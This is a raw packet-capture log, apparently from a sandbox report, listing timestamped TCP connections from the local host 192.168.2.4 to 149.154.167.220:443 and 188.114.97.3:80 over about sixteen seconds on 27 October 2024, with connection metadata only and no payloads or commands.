                                                                                                                  Oct 27, 2024 19:22:53.160777092 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160820961 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.160825014 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160881042 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.160900116 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160912991 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.160917997 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161243916 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161251068 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161324978 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161330938 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161365032 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161370993 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161550045 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161556005 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161690950 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161696911 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161803007 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161807060 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161891937 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161896944 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161947966 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161953926 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.161983967 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.161989927 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162007093 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162013054 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162228107 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162240982 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162269115 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162277937 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162292957 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162297010 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162328959 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162333965 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162360907 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162389994 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162390947 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162400961 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162465096 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162468910 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.162622929 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.162650108 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.289885044 CET4975880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.296005011 CET4975880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.296621084 CET8049758188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.347179890 CET8049758188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.411192894 CET8049758188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.411262035 CET4975880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.438394070 CET4975980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.446480036 CET8049759188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.446583033 CET4975980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.446664095 CET4975980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.453385115 CET8049759188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.766299963 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.766402960 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.767111063 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.767151117 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.767291069 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.768121958 CET4975980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.814440966 CET8049759188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.936954021 CET8049759188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.937024117 CET4975980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.940638065 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.946079016 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.946162939 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.949356079 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:53.954680920 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.305499077 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.311186075 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.542237043 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.586622000 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.857613087 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.857682943 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.857755899 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.976908922 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.977874041 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.983067989 CET8049760188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.983127117 CET4976080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.983226061 CET8049761188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:54.983299971 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.983453989 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:54.988754034 CET8049761188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:55.336704016 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:55.342040062 CET8049761188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:55.579770088 CET8049761188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:55.664746046 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:55.891129017 CET8049761188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.008223057 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.009102106 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.016681910 CET8049761188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.016741991 CET4976180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.017432928 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.017508030 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.017615080 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.024836063 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.368505955 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.374010086 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.588490009 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.593961000 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.594041109 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.594444036 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.599735022 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.647799015 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.866482973 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.866558075 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.946412086 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:56.951828957 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.951884031 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:56.975310087 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.055383921 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.100318909 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.101062059 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.106106043 CET8049762188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.106617928 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.106682062 CET4976280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.106750965 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.106857061 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.112212896 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.197110891 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.242861032 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.462683916 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.470586061 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.507241011 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.555372953 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.713009119 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.867896080 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.031605959 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.164758921 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.176062107 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.176415920 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.182279110 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.182339907 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.182758093 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.182832003 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.209662914 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.215291023 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.215389967 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.217063904 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.222522974 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.571202993 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.576658964 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.819880962 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.867901087 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.142858028 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.195996046 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.284347057 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.285360098 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.291404009 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.291480064 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.291584969 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.292953014 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.293011904 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.297020912 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.649451017 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.654891014 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.895333052 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.945997000 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.194859028 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.242866039 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.323828936 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.324173927 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.330413103 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.330459118 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.330528021 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.330564976 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.330681086 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.336049080 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.680715084 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.686153889 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.956592083 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.055392027 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.144697905 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.301338911 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.301758051 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.439527035 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.439599991 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.440059900 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.440123081 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.441716909 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.441793919 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.443068981 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.449450016 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.790693045 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.797358036 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.026992083 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.164750099 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.222079039 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.367876053 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.560245991 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.560842037 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.566191912 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.566246986 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.566646099 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.566693068 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.570138931 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.575443029 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.625802994 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.631171942 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.631241083 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.633383989 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.638777971 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.914840937 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.920305967 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.920424938 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.977435112 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.982855082 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.172195911 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.228634119 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.278883934 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.278899908 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.473891973 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.474694967 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.480443001 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.480503082 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.606415987 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.606887102 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.612196922 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.612263918 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.612346888 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.612375021 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.612495899 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.617866993 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.961806059 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.967308998 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.221579075 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.274113894 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.408225060 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.461625099 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.517185926 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.521003962 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.526371002 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.526839018 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.526927948 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.532577038 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.031265974 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.037425995 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.130562067 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.180370092 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.459125042 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.508483887 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.582480907 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.583106995 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.588357925 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.588413954 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.588449001 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.588640928 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.588754892 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.594101906 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.946269035 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.952493906 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.176573992 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.299352884 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.480262995 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.601731062 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.603252888 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.607503891 CET8049800188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.607568979 CET4980080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.608712912 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.610836029 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.610922098 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.616280079 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:06.961699009 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:06.967241049 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.220874071 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.326831102 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.513197899 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.664762020 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.955596924 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.956546068 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.961901903 CET8049806188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.961949110 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:07.962032080 CET4980680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.962044001 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.962234020 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:07.967600107 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.321492910 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:08.326884985 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.507574081 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:08.513082981 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.513158083 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:08.513313055 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:08.518599033 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.576694965 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.617875099 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:08.872344971 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:08.875416040 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.877820969 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.877830029 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:08.930376053 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.000490904 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.001770020 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.006295919 CET8049816188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.006351948 CET4981680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.007198095 CET8049824188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.007263899 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.007421970 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.012700081 CET8049824188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.108038902 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.164841890 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.352454901 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.360276937 CET8049824188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.424334049 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.424350023 CET8049818188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.424400091 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.623476982 CET8049824188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.664777040 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.838660002 CET8049824188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.969959021 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.970057011 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.970731974 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.976030111 CET8049818188.114.97.3192.168.2.4
